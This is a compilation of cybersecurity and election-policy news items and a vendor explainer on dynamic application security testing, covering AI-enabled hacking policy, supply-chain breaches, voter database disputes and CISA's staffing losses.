The Senate’s top Democrat called on the Department of Homeland Security Friday to work closely with state and local governments to defend against artificial intelligence-strengthened hacks. 

Senate Minority Leader Chuck Schumer, D-N.Y., wrote to DHS Secretary Markwayne Mullin to make sure state, local, tribal and territorial (SLTT) governments aren’t left behind as AI models advance, posing new hacking threats.

“There is a race between cybersecurity defenders and AI-enabled hacking — and there’s no time to waste,” Schumer wrote.

“While the White House has reportedly begun hosting meetings about its internal security priorities following these frontier AI cyber breakthroughs, it is glaringly obvious that the Department of Homeland Security needs an updated plan for coordinating these efforts with [state, local, tribal and territorial] governments and implementing procedures to reduce the risk of disruptive cyberattacks enabled by frontier AI,” he stated.

Schumer said he was worried about the capabilities of DHS and its Cybersecurity and Infrastructure Security Agency to carry out that coordination, given federal funding cuts to the Multistate Information Sharing and Analysis Center, and the lack of a Senate-confirmed CISA director for the duration of the second Trump administration.

Schumer wants a plan from DHS by July 1 on coordinating with state and local governments on a range of questions, such as how to identify top AI talent, carry out rapid patching and conduct risk assessments.

“AI is changing the cyber battlefield fast — and we cannot let hackers get there first,” Schumer said in comments accompanying the letter. “Hospitals, power grids, water systems, schools, elections, and emergency services cannot be left exposed while criminal gangs and state-backed hackers race to exploit new AI tools. DHS must immediately help states and localities find and fix vulnerabilities before Americans are hit with outages, disruptions, and attacks that could put lives and livelihoods at risk.”

CISA is using AI to help on the defensive side internally, agency officials recently said.

The post Sen. Schumer seeks DHS plan on AI cyber coordination with state, local governments appeared first on CyberScoop.

The company is expanding its platform’s capabilities with the acquisition of SecureIQx and Korbit.ai.

The post Boost Security Raises $4 Million for SDLC Defense Platform appeared first on SecurityWeek.

Mitiga researchers say attackers can silently redirect Claude Code MCP traffic, intercept OAuth tokens, and maintain persistent access to connected SaaS platforms.

The post Claude Code OAuth Tokens Can Be Stolen Through Stealthy MCP Hijacking appeared first on SecurityWeek.

Agentic AI can be expensive to use, causing further and unpredictable pressure on tight budgets.

The post Sevii Launches Cyber Swarm Defense to Make Agentic AI Security Costs Predictable appeared first on SecurityWeek.

ON SECURITY By Susan Bradley One thing the World Wide Web has done in recent years is introduce new ways to scam, trick, entice, and generally be a drag on our time — and potentially a hit to our pocketbooks. Here are some threats I’ve seen in recent months. Read the full story in our […]

OpenAI said it is expanding its Trusted Access for Cyber program to “thousands of individuals and organizations,” who will use the company’s technology to root out bugs and vulnerabilities in their products.

The program will also incorporate  GPT 5.4 Cyber, a new variant of ChatGPT that OpenAI says is specifically optimized for cybersecurity tasks. OpenAI’s goal with this release is to make advanced cybersecurity tools more widely accessible.

The company said access to the program and cybersecurity-focused model will still be governed by “strong” Know-Your-Customer and identity verification rules to help prevent the model’s spread to bad actors.

“Our goal is to make these tools as widely available as possible while preventing misuse,” the company said in a blog posted Tuesday. “We design mechanisms which avoid arbitrarily deciding who gets access for legitimate use and who doesn’t.”

OpenAI’s announcement comes one week after Anthropic rolled out Project Glasswing, a similar effort that seeks to provide major tech companies with Claude Mythos, an unreleased model that Anthropic officials have claimed is too dangerous to sell commercially.

OpenAI officials noted they publicly announced Trusted Access for Cyber program months earlier. They have also quietly avoided direct comparisons to Mythos, and GPT 5.4 Cyber.

Cybersecurity experts in the U.S. and UK have described Mythos as a significant improvement from previous frontier models around identifying (and potentially exploiting) cybersecurity vulnerabilities, though there remains debate and speculation about the model’s ultimate impact on information security.  

Similarly, GPT 5.4 Cyber has been finetuned for testing and vulnerability research, though OpenAI wants to make iterative improvements to the program as lessons are learned.

The company has plans to allow  a broader group of cyber operators to use the model to protect critical infrastructure, public services and other digital systems. The company said it is also leery of having too much influence over which industries or sectors ultimately take part in the program.

“We don’t think it’s practical or appropriate to centrally decide who gets to defend themselves,” the blog stated. “Instead, we aim to enable as many legitimate defenders as possible, with access grounded in verification, trust signals, and accountability.”

The post OpenAI expands Trusted Access for Cyber program with new GPT 5.4 Cyber model  appeared first on CyberScoop.

Sen. Ron Wyden, D-Ore., warned Social Security Administration chief Frank Bisignano that any follow-through on President Donald Trump’s executive order creating a new database of U.S. voters using agency data would be viewed by Democrats as a conscious choice on the part of SSA officials to participate in “blatant voter suppression.”

“Facilitating Donald Trump’s directive to create a flawed voter database would be willing participation in blatant voter suppression ahead of consequential midterm elections,” Wyden, the top Democrat on the Senate Finance Committee, wrote in a letter to Bisignano sent Friday.

The executive order, issued March 31, directs the Homeland Security secretary, the director of U.S. Citizenship and Immigration Services and the commissioner of the Social Security Administration to compile lists of American voters for each state, including their supposed citizenship status.

To build the lists, the agencies would rely on the controversial Systematic Alien Verification for Entitlements database that DHS has been building under the Trump administration, as well as Social Security and federal citizenship and naturalization records.

Those lists would then be transmitted to states, most of which have already rejected previous Trump administration efforts to collect voter data or dictate voter registration lists. Another section of the order would direct the postmaster general to develop a similar state-by-state list of voters eligible to vote by mail.

“The clear intent of this executive order is to undermine vote-by-mail and disenfranchise eligible voters,” Wyden wrote. “SSA has a duty to ensure its data is not misused as part of this effort.”

Wyden echoed numerous state officials and election experts in calling the Trump administration’s executive order an unconstitutional encroachment by the executive branch on election authorities that the U.S. Constitution clearly delineates to Congress and the states.

The White House’s executive order has already been challenged in lawsuits from states officials and voting rights advocates, and a previous, less ambitious executive order issued last year that attempted to assert similar executive branch authorities was largely overturned by U.S. courts.

Wyden’s missive essentially asks Bisignano to consider whether following the Trump administration’s order would conflict with his responsibility to safeguard Social Security records under laws like the Privacy Act and the Social Security Act.

He asks how the agency will ensure it’s not disenfranchising voters, and whether it sought permission from citizens to use their Social Security data for a federal elections list, noting that the agency’s own regulations limit the sharing of Social Security data to “routine use for determining eligibility or amount of benefit in a health or income maintenance program.”

Expanding the agency’s role to elections — an area it has no background or experience in — would be in direct conflict with those rules.

“Simply put, sharing Americans’ personal data to DHS for creating a ‘state citizenship’ list does not meet this standard,” Wyden wrote.

The post Wyden warns Social Security chief: Trump’s voter database is ‘blatant voter suppression’ appeared first on CyberScoop.

A long-lived NPM access token was used to bypass the GitHub Actions OIDC-based CI/CD publishing workflow and push backdoored package versions.

The post Axios NPM Package Breached in North Korean Supply Chain Attack appeared first on SecurityWeek.

After validating stolen credentials using TruffleHog, the hacking group started AWS services enumeration and lateral movement activities.

The post TeamPCP Moves From OSS to AWS Environments appeared first on SecurityWeek.

President Donald Trump signed an executive order Tuesday that purports to limit mail-in voting, though critics say the move will almost certainly be challenged in court on constitutional grounds.

The order instructs the Homeland Security secretary, the director of U.S. Citizenship and Immigrations Services and the commissioner of the Social Security Administration to compile lists of American voters for each state, including their supposed citizenship status.

To build the lists, the agencies would rely on the controversial Systemic Alien Verification for Entitlements database that DHS has been building under the Trump administration, as well as Social Security and federal citizenship and naturalization records.

Those lists would then be transmitted to states, most of which have already rejected previous Trump administration efforts to collect voter data or dictate voter registration lists. The White House order instructs the Department of Justice to prioritize the investigation and prosecution of state and local officials or any others involved in the administration of federal elections who issue federal ballots to individuals not eligible to vote in a federal election.  

The order also directs the postmaster general to issue new proposed regulations that require mail-in ballots to be mailed in special envelopes that include barcodes for tracking. Crucially, it asks states ahead of time whether they intend to submit a list of voters eligible to vote by mail, and attempts to assert the authority to deny sending ballots to states that do not participate. It also claims the attorney general is entitled to withhold federal funding from noncompliant states.

The Trump administration’s previous efforts to aggressively assert executive branch authority over elections have been rebuffed by courts, with judges noting the U.S. Constitution explicitly empowers states and Congress to set the time, manner and place for elections. 

The order justifies White House involvement by claiming it has “an unavoidable duty” under Article II of the Constitution to maintain confidence in election outcomes by preventing violations of criminal law. But numerous post-election audits, investigations and recounts have consistently confirmed over decades that criminal non-citizen voting is infinitesimally rare in U.S. elections, and for the small number that did, most turn out to be accidents or decades-old administrative errors.

Criticism from election officials, experts and Democrats in Congress was swift.

Minnesota Secretary of State Steve Simon, who has resisted demands by the DOJ to hand over state voter data, predicted the order “will meet the same fate” as previous executive orders in being struck down by courts. Other secretaries of state have issued similar statements rejecting the order’s constitutionality. 

“Our office has helped stop his actions before and we are now exploring our legal options to stop this new order from taking effect,” Simon said in a statement to CyberScoop.

He also stumped for mail-in voting, calling it a secure, trustworthy and convenient way for citizens to exercise their rights to vote. Local election officials “track every ballot” sent by mail and have a range of checks and safeguards to ensure they’re sent to only eligible voters and that voters can only cast one ballot.

“Absentee voters who choose to vote by mail must provide a matching ID number, sign their signature envelope, and have a witness sign their ballot envelope before returning their ballot,” Simon said. “All of that information is tracked digitally by election administrators. Voters are able to track the status of their ballot using our online ballot tracker tool. Any attempt to register or cast a ballot while ineligible is referred for investigation and potential prosecution.”

Sen. Alex Padilla, D-Calif., called the order a “blatant, unconstitutional abuse of power” and said he expected “immediate” lawsuits challenging its legality.

“The President and the Department of Homeland Security have no authority to commandeer federal elections or direct the independent Postal Service to undermine mail and absentee voting that nearly 50 million Americans relied on in 2024,” Padilla said in a statement. “A decade of lies about election fraud does not change the Constitution.”

David Becker, executive director for the Center for Election Innovation and Research, said the administration’s latest mandates are so far outside the constitutional limits of the executive branch they will almost certainly be halted through lawsuits. 

“Some may freak out about this, but honestly, this is hilarious,” Becker wrote on Bluesky. “It’s clearly unconstitutional, will be blocked immediately, and the only thing it will accomplish is to make liberal lawyers wealthier. He might as well sign an EO banning gravity.”

However, while lower courts have consistently struck down previous orders and lawsuits from the White House, election experts have expressed concerns that the Supreme Court’s conservative majority — which has clashed with lower courts over the Trump administration’s constitutional authority — appeared receptive to the administration’s position in a recent oral argument.

Alexandra Chandler, director of the Free and Fair Elections program at nonprofit Protect Democracy, said in a statement that the White House order “is more like an attempted executive override” of state authority over elections.

“Meant to solve for a problem that exists only in the false rhetoric of the Trump administration and its political fortunes, the [order] is a classic example of their playbook to deceive the American people and disrupt the election process in order to deny any future results that don’t suit them,” Chandler said.

The post White House executive order purports to limit mail-in voting, mandate federal voter lists  appeared first on CyberScoop.

The startup has built an edge security management (ESM) platform, an AI engine atop the entire edge security stack.

The post Huskeys Emerges From Stealth With $8 Million in Funding appeared first on SecurityWeek.

A year-long effort to strengthen cybersecurity and modernize tech at U.S. intelligence agencies has led to policy standards for using AI to bolster cyber defenses, a shared repository of all apps that have undergone a cybersecurity review and more, the Office of the Director of National Intelligence announced Thursday.

An unclassified summary of cyber and tech modernization work under the first year of DNI Tulsi Gabbard’s stewardship states that the office has expanded the automation of threat hunting across intelligence community networks. (The Cybersecurity and Infrastructure Security Agency conducts threat hunting across federal civilian agencies.)

The ODNI also has developed a zero-trust strategy that shifts “to a data-centric security model that protects information regardless of location or network,” according to the summary.

“Over the past year, we have taken meaningful steps to begin fulfilling that responsibility through the largest IC-wide technology investment and modernization effort in history,” Gabbard said in a news release. “President Trump’s Intelligence Community is moving faster and more decisively on cybersecurity modernization and investments in IT than ever before, delivering stronger defenses, greater efficiency, and real cost savings for the American people.”   

It constitutes the first significant cybersecurity announcement out of the office under Gabbard and the second Trump administration.

While the year-long effort began before the recent release of a national cyber strategy, the ODNI initiatives reflect many of its goals, including better protection of federal networks, advancing artificial intelligence for defensive purposes and going on offense against cyber adversaries.

The ODNI directed its National Counterintelligence and Security Center “to proactively combat foreign intelligence actors seeking to engage in cyber-attacks against U.S. interests,” according to the summary. 

The idea of an intelligence community repository of cybersecurity authorizations is to save both time and money, as it would allow agencies to capitalize on the testing of apps that other agencies have done without having to repeat them. 

On AI, the ODNI is “developing the policy framework, governance, and standards necessary to accelerate AI adoption for cybersecurity and other critical technology,” the summary states.

“Protecting our nation’s most sensitive information from those who seek to exploit it, while making sure our intelligence professionals have the tools and access they need to do their jobs, is not optional. It is essential to our national security,” Gabbard said. 

Gabbard’s appearance earlier this year during an FBI search of an elections office in Georgia has drawn congressional scrutiny, an appearance she has defended in part by citing her office’s role in coordinating and analyzing intelligence related to cybersecurity. Gabbard’s own personal cybersecurity practices prior to taking the job of DNI have also raised questions.

The post ODNI tackles AI, threat hunting, app cybersecurity in year-one tech review appeared first on CyberScoop.

The hackers compromised GitHub Action tags, then shifted to NPM, Docker Hub, VS Code, and PyPI, and teamed with Lapsus$.

The post From Trivy to Broad OSS Compromise: TeamPCP Hits Docker Hub, VS Code, PyPI appeared first on SecurityWeek.

A California county sheriff and Republican contender for the state’s gubernatorial race has seized 650,000 physical ballots from Riverside County, saying they were part of an investigation into election fraud tied to redistricting wars.

State officials and election security experts say that the underlying allegations are spurious and local law enforcement do not have the authority to unilaterally investigate or validate election results.

Riverside County Sheriff Chad Bianco said at a news conference Friday that he intended to conduct a hand count of the ballots, which were tied to elections last November, and “compare that result to the total votes recorded.”

In a March 6 letter, California Attorney General Rob Bonta directed Bianco to pause the investigation until the state could review “the factual and legal basis” for the probe and seizure.

Based on an initial review of the warrants and affidavits in the case, Bonta wrote that his “office has serious concerns as to whether probable cause existed to support the issuance of the warrants, and whether your office presented the magistrate with all available evidence as required by law.” 

While Bonta’s letter does not describe the underlying content of the search warrants, it points to a public presentation made by a resident at a Feb. 10 Riverside County Registrar of Voters meeting that “addresses the alleged vote discrepancy that appears to be the basis of your investigation.”

In that meeting, an individual identifying himself as “Errol” — wearing a “Trump 2028” hat — alleged the council had participated in local, state and federal election fraud.

At several points, the individual said he relied on Google for information on individuals and companies he was accusing of receiving improper payments. At another point, he claimed the Riverside County auditor would not disclose the purpose behind thousands of pages of county payments, before saying “you’re not getting the files, I got them put away.”

“We have a lot of problems, you guys. You’ve committed serious fraud here, forever,” the individual alleged, adding that he hoped the members of the council were imprisoned.

Bonta accused Bianco of “flagrantly violating my directives” under the California State Constitution, and threatened court action should he proceed with the investigation and hand recount.

The act by Bianco — who is running third in the state’s open primary for governor this month, per an Emerson College poll — is the second such seizure of ballots to take place this election cycle, following the FBI’s raid of Fulton County, Georgia’s election office.

Gowri Ramachandran, director of elections and security at the Brennan Center for Justice, told CyberScoop that the election allegedly being investigated wasn’t a close race. Further, like virtually every other election, candidates or parties have opportunities to contest irregularities or results, including automatic recounts or recounts paid by candidates or campaigns — along with state courts that regularly adjudicate questions of election outcomes.

“It’s important for people to know none of those processes involve someone coming in and haphazardly coming in and grabbing the ballots,” she said, adding: “I worry if it happens closer to an actual election what it could do to interfere with it.”

Ramachandran said that by seizing physical ballots, which she called “the gold standard” we use for determining ground-level truth about voter intent, Bianco was disrupting the chain of custody that is one of the key processes designed to give voters trust in their elections.

“It should just be a really high bar, not just, ‘I’m suspicious, I want to do a fishing expedition,’” she said. “That’s not enough to have someone who doesn’t have any experience in counting ballots or keeping them safe [to] just come in and grab all that stuff.”

Bonta’s suggestion that Bianco did not materially inform the courts echoes what Fulton County officials alleged in their own lawsuit, which accused the FBI of presenting the judge with a “flagrantly misleading narrative” that omitted key evidence, undermining the government’s basis for investigating the 2020 ballots. 

The post State officials, election experts question California sheriff’s seizure of ballots appeared first on CyberScoop.

Regardless of where you’re at in your application security maturity, dynamic application security testing (DAST) is a program staple in a few key ways:

1. It satisfies compliance requirements for runtime-related vulnerabilities. 

2. DAST catches vulnerabilities in the running web application, yielding findings that may be missed in static code testing.

3. It is security-driven with little overhead in configuration/maintenance from development or application teams.

Due to the nature of web apps powering mission-critical operations – hyperscaled of course by AI protocols that automate key processes within these apps – continuous DAST is essential to identifying and remediating potential weaknesses that could quickly lead to costly data breaches.

Compliance requirements

DAST helps satisfy multiple compliance requirements by simulating real-world attacks so it can test a running application for vulnerabilities.. While DAST alone doesn’t make you compliant, it supports key controls in many security standards and regulations. Get to know 7 of today’s top standards and frameworks, see which requirements they satisfy, and learn how DAST helps secure the following:

PCI DSS

Payment Card Industry Data Security Standard (PCI DSS) is the global security standard for any organization that stores, processes, or transmits payment-card data. DAST directly supports PCI compliance by performing vulnerability scans against live web apps.

Requirements satisfied: 

• Requirement 6.1 & 6.2: Identifying and addressing vulnerabilities.

• Requirement 6.6: All public-facing web applications must be either:

• Protected with application-layer firewall (WAF), or

• Tested for vulnerabilities (e.g., via DAST) at least annually.

---

OWASP Top Ten

While the Open Worldwide Application Security Project (OWASP) is not a compliance framework, the nonprofit organization is often referenced by industry and regulatory standards. 

Requirements satisfied:

• DAST tools are often tested against OWASP Top 10 vulnerabilities (e.g., XSS, SQLi, SSRF).

---

HIPAA

The Health Insurance Portability and Accountability Act (HIPAA) sets national standards for protecting electronic protected health information (ePHI). DAST supports risk assessment by identifying live vulnerabilities with the potential to expose such information.

Requirements satisfied: 

• Security Rule (45 CFR § 164.308 & § 164.312):

• Requires organizations to perform regular risk assessments.

• Includes application-level vulnerabilities as part of overall system security.

---

ISO/IEC 27001

ISO/International Electrotechnical Commission (ISO/IEC) is the international standard that specifies requirements for an information security management system (ISMS). DAST helps fulfill this requirement by scanning running applications for known and exploitable vulnerabilities.

Requirements satisfied: 

• Annex A.12.6.1: Management of technical vulnerabilities – Requires timely detection and remediation of vulnerabilities.

---

NIST SP 800-53/800-171

The National Institute of Standards and Technology (NIST) is a U.S. federal agency that develops measurement science, standards, and tech to boost innovation and economic security. DAST can be used to meet these technical controls.

Requirements satisfied: 

• RA-5 (vulnerability scanning): Requires scanning of systems and applications.

• SI-2 (faw remediation): Identify, report, and fix flaws in software.

---

SOC 2

System and Organization Controls 2 (SOC2) is an independent attestation report (from a licensed CPA firm) that evaluates whether a service organization’s controls are suitably designed. DAST contributes evidence for audit logs and control effectiveness over time.

Requirements satisfied: 

• Under the "Security" Trust Services Criteria, particularly:

• CC4.1: Monitor infrastructure for new threats.

• CC7.1/CC7.2: Detect and mitigate vulnerabilities.

---

GDPR

General Data Protection Regulation (GDPR) harmonizes privacy rules across the EU and sets requirements for how organizations collect, use, share, and protect personal data. DAST can be part of regular security testing under GDPR, especially if the app processes personal data.

Requirements satisfied: 

• Article 32 – Security of Processing:

• Organizations must ensure the ongoing confidentiality, integrity, availability of systems.

• Requires regular testing and evaluation of security measures.

Missed findings

Static application security testing (SAST) tools are effective at flagging insecure values on their own, but they often miss the broader application context needed to assess whether those values actually introduce risk. Here are some examples of findings that can be overlooked:

Forced browsing

Forced browsing (also called insecure direct object reference or unauthorized resource access) occurs when:

• A user can manually access restricted resources (files, endpoints, or actions) by guessing or modifying a URL.

• There are missing access controls or authorization checks.

Example: A user modifies a URL

https://example.com/admin/settings

Even though they’re not an admin, the app still serves the page because it lacks proper access controls.

SAST struggles to detect these findings due to:

• Lack of visibility into runtime access control

• SAST scans source code, but can’t simulate user roles or sessions.

• It doesn’t know who should or shouldn't be able to access a specific path.

• Abstracted access control logic

• Authorization might be handled via middleware, annotations, config files, or external services (e.g., OAuth).

• SAST often can’t follow the full enforcement logic, especially if it's custom or dynamic.

• Lack of awareness around routing and resource exposure

• SAST doesn’t map which endpoints exist versus which are intended to be public.

• It can’t verify which files/resources are accessible through URLs.

Out-of-band (OOB) cross-site scripting (XSS)

Out-of-band cross-site-scripting OOB XSS (a subtype of stored or blind XSS) occurs when:

• A malicious script is injected into an application (e.g., a form, comment, or field).

• The script doesn’t execute immediately but instead fires later, often:

• In a different user’s browser (e.g., an admin viewing logs).

• In an email client (e.g., via notification messages).

• In a third-party system or admin dashboard.

These attacks are asynchronous and context-shifted, meaning they don’t happen in the direct request-response flow. SAST struggles to detect these findings due to:

• Missing runtime context: SAST analyzes source code statically, line by line, without executing it. It doesn’t track:

• Where the injected payload ends up.

• How or where it's later rendered.

• Whether it’s rendered in a dangerous context (HTML, JS, email, etc.).

• Visibility is limited to code flow: SAST typically can’t follow data across storage layers or external systems. OOB XSS often spans:

• User-submitted input → stored in DB.

• Later retrieved → rendered in admin UI or email.

• Unable to observe execution: The XSS payload doesn't fire in the original request, so SAST has no way to "see" the exploit being triggered because it doesn't execute code.

Web config findings

Settings defined in the web config file can pose challenges for SAST tools. Depending on the tooling, these files may not be properly parsed, potentially causing the tool to miss important findings due to a lack of contextual understanding, such as:

Custom error handling depends on deployment mode

<customErrors mode="RemoteOnly" />

⠀
✔ Looks fine in static analysis; it shows friendly errors to remote users.

✖ Contextual issue: If the app is misconfigured to treat all users as local, then stack traces are exposed even with this setting.

SSL enforcement logic in code, not in config.

<rewrite>
<!-- Missing rule for HTTPS redirection -->
</rewrite>

⠀
✔ SAST flags the absence of HTTPS redirection in web.config, which is a valid finding.

✖  Contextual issue: If HTTPS redirection is handled in middleware or at a reverse proxy (like NGINX or Azure App Gateway), then this isn't actually a security risk. SAST can’t always know that.

Authentication mode

<authentication mode="None" />

⠀
✔ SAST will likely flag this as a critical issue.

✖  Contextual issue: If the app is a microservice behind an API gateway that handles auth, this may be acceptable. A SAST tool unaware of deployment architecture may raise false positives.

Debug enabled in a non-prod environment

<compilation debug="true" />

⠀
✔ Flagged by SAST, correctly so in most cases.

✖ Contextual issue: If this web.config is only used in a staging or development slot, it might be intentional and not a production risk.

Authorization settings ignored in custom pipelines

<authorization>
  <deny users="?" />
</authorization>

⠀

✔ This looks like it blocks anonymous access.

✖ Contextual issue: If a custom authentication mechanism bypasses ASP.NET authorization modules, this setting may be ineffective, but a SAST tool won't see that unless it's deeply integrated with the entire codebase.

Developer overhead

For organizations seeking to minimize developer burden, DAST is frequently the preferred option over SAST.  DAST processes evolve alongside your web applications, continuing to scan them so that your business can promptly identify and remediate emerging issues. Let’s finish by taking a look at a range of underlying dynamics that make DAST an easy decision for developers looking to fortify application security – table below.

⠀

ON SECURITY By Susan Bradley Tax season provides an opportunity for businesses to do better. Before I get started, note that I’m writing this as an accounting professional in the United States. By their very nature, my observations will be US-centric. But the truth is that the underlying concept is the security of sensitive information, […]

“Decimated.” 

“Amateur hour.”

“Pretty much fallen apart.”

“It’s really hard to find something positive to say right now.”

It’s been a little more than one year into the second Trump administration, and there’s a large consensus, if not total unanimity, among those who have worked with and for the Cybersecurity and Infrastructure Security Agency: It has suffered significantly during that time. 

CISA has lost roughly a third of its personnel and shuttered entire divisions. Observers across the political spectrum told CyberScoop for this story that even on its core missions, like coordinating with industry and protecting federal networks, the agency is significantly diminished.

Many sources that spoke with CyberScoop did so under the condition of anonymity, in order to be more candid or avoid retribution. They told CyberScoop that CISA’s biggest problems, and their consequences, include:

• Trump’s ire over the 2020 election results has led to the agency being deprioritized within the administration. Congress has yet to approve the administration’s permanent pick to lead the agency, Sean Plankey, and lawmakers have failed to do other things to strengthen it. 
• CISA’s capabilities have been significantly diminished by the loss of personnel, expertise and programs. 
• In the absence of a permanent leader, Acting Director Madhu Gottumukkala has struggled to lead the agency. “I don’t think anybody would argue he’s doing a great job,” one industry source said.
• Organizations that previously turned to CISA for help now seek alternatives, like industry alliances, outside consultants or government-to-government partnerships.

Where to assign blame varied from source to source. Most criticized both the administration and Congress, though some faulted one more than the other.

Some see bright spots in CISA under the current administration. And while many are pessimistic about the agency’s future, others expressed optimism.

But the first year reviews are not glowing.

“Year one was a tough year for the agency,” said House Homeland Security Committee Chairman Andrew Garbarino, R-N.Y. He noted that a “lot of the best and brightest have left the agency,” though he expressed optimism about Plankey’s ability to turn CISA around. “The amount of cyberattacks that our nation is seeing every day, both on the private side and on the federal government side — you want your best people there fighting against it, and if they’re somewhere else, it definitely leaves us all vulnerable.”

Said Mississippi Rep. Bennie Thompson, the top Democrat on Garbarino’s panel: “It’s tough to have a robust entity when you cut the money…we are weaker because of CISA’s lack of manpower.”

When priorities shifted

Trump has harbored animosity toward CISA since 2020, when it contradicted his false claims related to widespread electoral fraud. He and his allies built on that animosity, recommending in Project 2025 that the agency be dismantled, divided by its core responsibilities, and farmed out to other federal agencies. 

“There was uniquely a target on its back,” said one CISA official who left in 2025. That hostility came from some Republicans in Congress, especially Kentucky Sen. Rand Paul, who chairs the Senate Homeland Security and Governmental Affairs Committee.

Said Thompson: “CISA wasn’t politicized for the most part, until the Trump administration came along and accused them of somehow contributing to his [election] loss.”

CISA has lost substantial personnel, including veterans and whole teams. Some employees were transferred to other divisions in the Department of Homeland Security. Election security was quickly cut. Two information sharing and analysis centers (ISACs) that serve state and local governments lost funding. A division coordinating with foreign governments, businesses and state and local governments was effectively closed.

The agency has lost senior leaders in programs like counter-ransomware initiatives, threat hunting and secure software development. Contracts for things like detecting threats in critical infrastructure networks, tracking vulnerabilities and collaborating with industry teetered, albeit sometimes only temporarily. 

DHS has unraveled multiple programs in which CISA plays a key role, such as by dismissing members of the Cyber Safety Review Board and disbanding the Critical Infrastructure Partnership Advisory Council. Congress has lurched between letting both a key state and local cyber grant program and a cyber threat information sharing law lapse and temporarily re-upping them.

The departures and program changes likely haven’t ended, either. 

“It’s not a very harmonious place right now,” said one industry source. “I hear from people that are looking to leave.” Former CISA employees say those who remain either believe strongly in the mission, or are simply keeping their heads down until retirement from federal service.

“People I talk to say the morale is really low,” said James Lewis, distinguished fellow with the tech policy program at the Center for European Policy Analysis think tank.

CISA and DHS officials routinely say the changes are designed to get the agency “back on mission.” Lewis, industry officials and others say CISA probably never needed to get involved in combatting misinformation and disinformation, roles that rankled some conservatives, but the agency largely halted that work prior to Trump returning to office.

Some saw duplication and redundancy at CISA as legitimate problems. “I did see overlap between who was actually doing policy and who was actually doing the operational work,” said Ari Schwartz, managing director of cybersecurity services at the law firm Venable and a former Obama administration cybersecurity official.

It was not that long ago when CISA experienced quick budget growth, particularly after its establishment in 2018.

“As with any organization, the first few years are growth years and after a while, the agency needed to reevaluate how it was operating and meeting its statutory authorities,” said Kate DiEmidio, who formerly served as the agency’s director of legislative affairs and acting chief external affairs officer. “There was a need for the agency to refocus.”

Even among those who saw the need for change at CISA, though, many saw the Trump administration as going way too far. “CISA needed surgery,” Lewis said, but “what it needed was surgery with a scalpel, not a sledgehammer.” He added, “Not only is the White House hostile to CISA, but cybersecurity isn’t a priority for them.”

A question of capacity

The cuts have created real-world consequences for cybersecurity coordination. Former officials and industry partners describe broken relationships, unanswered requests for help and serious questions about whether CISA can handle a major crisis. The coordination and engagement that defined the agency’s approach have largely diminished.

The end result is that “they’ve dismantled all of those capabilities in units within government,” said Caitlin Durkovich, a former DHS official in the Obama administration and White House official in the Biden administration. She recently started a firm with former top CISA official Jeff Greene that offers services CISA has scaled back, such as security assessments.

“It’s been really hard to watch,” Greene said, how CISA has been working with the private sector and local governments on “developing a level of trust that is weakening or gone.”

One industry source said they used to meet regularly with top officials, but now can’t get a response. “We’ve got really good engagement elsewhere in government. We really would like the opportunity to do the same thing with CISA,” they said. “Some of the trust that had been built up has been eroded.”

Thompson said the biggest losses have been in election security and secure-by-design, areas where his staff says personnel has been “decimated.”

Said another industry source: “I do feel like that when people, if organizations, want to reach out to CISA, it’s not clear who’s there… If we got into a major conflict, let’s say, with China, and they start triggering Volt Typhoon-related malware, are we organized and ready to roll? I don’t think so.”

Another former CISA official described the current situation as a “lack of capacity,” especially when it comes to coordinating with state and local governments and others on a regional basis.

“A bunch of regions are really grappling with the loss of really key personnel who were the ones that were establishing and maintaining these relationships, and really trying to build the trust between the agency and the private sector, and especially in critical infrastructure,” they said. “Not having as many people to help do that national coordinating function that CISA is supposed to do is a real issue.”

They also said there are fewer people working in “flagship programs” like secure-by-design and developing regulations for the landmark Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA). “People are overstretched,” they said. “They’re not doing all the things that they could or should be doing, or want to be doing, and I think that you see evidence of that with talk from the private sector and their inability to to reach people and to get help “

Schwartz said he worries about when “an incident happens, do they have the people to go in, go to the states, go locally, and really do the work that’s needed, as they did in the past? Because they’ve lost some of that ability.”

Lewis said that “overall, the impression is it’s a much weaker entity than it was a year ago.”

“Their power was in their ability to act as a focal point, to coordinate, to bring people together, and just the publication of vulnerabilities and some of the things they were starting to get into in the previous administration were big steps forward that’s been diminished because they don’t have the people now,” he said. “So a smaller organization, that’s just not going to be as powerful.”

State and local governments say they’ve lost critical connections with CISA, saying they’ve had to turn to one another to fill the gaps.

“We’re asking states to do a job they’re not resourced to do, while weakening the one federal agency designed to help them,” said Errol Weiss, chief security officer at the Health-ISAC. “This is precisely where you do need a strong, centralized federal security function. We already have a national shortage of cybersecurity experts, and you can’t just replicate that expertise 50 times over.”

Overall, Weiss said industry partners have felt the lack of outreach from the agency. “Fewer touchpoints, fewer briefings, fewer problem‑solving calls,” he told CyberScoop, adding that there’s “a growing perception that CISA is being hollowed out where it matters most to industry: stakeholder engagement, collaborative forums, and operational support during incidents.”

Rob Knake, a former top Biden administration official, recently said that “CISA as an organization has pretty much fallen apart.”

Leadership in limbo

One near-universal sentiment is that as Sean Plankey’s leadership nomination drags in the Senate, the agency is worse off.

“We need to start this year off right, and we’re already in February and can’t get Plankey confirmed,” Garbarino said. “There’s nothing better than having a Senate-confirmed person running the show.”

The acting director has also faced criticism beyond the operational issues. Gottumukkala, who served as South Dakota’s chief information officer under Kristi Noem before she became DHS secretary, has faced fire from both parties for his stewardship.

A string of embarrassing stories have emerged about Gottumukkala, from the tale of him failing a polygraph test and seeking to oust those who administered it; to his reported attempted ouster of veteran agency CIO Robert Costello; to his reported uploading of sensitive contract data to ChatGPT. DHS has defended Gottumukkala amid those revelations.

Reading stories like that, “It just sounds like amateur hour,” said one former CISA employee.

“I don’t think he’s up to the task. I believe that he’s not the best person, and I think he is just somebody the secretary likes, because they both are from South Dakota.” Thompson said. “I don’t know anybody before this administration who would be in sensitive areas and not have passed minimal standards like the polygraph.”

The ChatGPT story drew concern from the right by Senate Judiciary Chairman Chuck Grassley, R-Iowa, as well as from conservative figure Laura Loomer (the latter of whose remarks were racially tinged). Others were more perturbed by the lie detector story.

“When you have security issues with someone in a leadership position, you should find another place for them to go,” said a former Trump administration national security official. “There are plenty of competent people in DHS, in CISA, who could hold things together until Sean Plankey gets there. There are lots of serious things CISA needs to be working on right now. This is a drag on that. It’s not a place where you want any type of friction at the top.”

Garbarino was more generous, noting Gottumukkala’s technical background. DiEmidio also noted Gottumukkala’s technical skills. But Garbarino and Nevada Rep. Mark Amodei, the GOP chairman of the House Appropriations Subcommittee on Homeland Security, have been seeking CISA’s organizational plans to no avail.

